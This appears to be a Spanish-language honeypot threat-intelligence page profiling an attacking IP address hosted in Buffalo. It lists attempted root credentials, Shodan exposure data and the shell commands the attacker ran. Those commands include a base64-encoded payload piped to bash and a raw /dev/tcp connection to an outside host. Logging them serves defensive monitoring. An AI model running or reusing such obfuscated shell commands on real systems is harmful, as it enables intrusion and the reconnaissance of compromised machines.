TROYANOSYVIRUS
Amenaza ActivaBAJO

154.16.112.232

Primera Deteccion29/12/2025
Ultima Actividad18/4/2026
ISPWHG Hosting Services Ltd
🎯
40
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
1
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
Buffalo
ASN
AS14670
ISP
WHG Hosting Services Ltd

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

22

Malware Asociado

Credenciales Intentadas

🔐root/root
2x
🔐root/(vacio)
1x

Comandos Ejecutados

$<& 3 exec 3 >& -1x
$echo VpnFdSe4kL;echo ZXhlYyAzPD4vZGV2L3RjcC8xMDQuMTguMTE1Ljk3LzgwCmVjaG8gLWVuICJHRVQgLyBIVFRQLzEuMFxyXG5Ib3N0OiBpY2FuaGF6aXAuY29tXHJcblVzZXItQWdlbnQ6IGN1cmwvN1xyXG5cclxuIiA+JjMKKHdoaWxlIHJlYWQgbGluZTsgZG8KIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKZG9uZSAmJiBjYXQpIDwmMwpleGVjIDM+Ji0K|base64 -d|bash1x
$while read line1x
$while read line ; do [ [ $line == $\r ] ] && break done && cat1x
$exec 3<>/dev/tcp/104.18.115.97/80 echo -en "GET / HTTP/1.0\r\nHost: icanhazip.com\r\nUser-Agent: curl/7\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&-1x
$break done1x

Exposicion segun Shodan InternetDBShodan

Datos de InternetDB, actualizacion no en tiempo real

Puertos
222553809939953306
Vulnerabilidades
CVE-2014-9426CVE-2009-4517CVE-2013-1635CVE-2016-5771CVE-2012-4557CVE-2023-31122CVE-2019-6977CVE-2019-9637CVE-2016-9137CVE-2016-3166CVE-2007-6752CVE-2008-6836CVE-2014-4049CVE-2016-4537CVE-2018-10547CVE-2015-4644CVE-2016-3142CVE-2021-39275CVE-2009-2610CVE-2016-7125
Hostnames
peanut.dmpress.org
CPEs
cpe:/a:mysql:mysql:5.1.56cpe:/a:php:php:5.3.6cpe:/a:drupal:drupal:6.25cpe:/a:drupal:drupalcpe:/a:apache:http_server:2.2.17cpe:/a:openbsd:openssh:5.4cpe:/a:postfix:postfixcpe:/o:fedoraproject:fedora

Evaluacion de Riesgo

35
/100
BajoMedioAltoCritico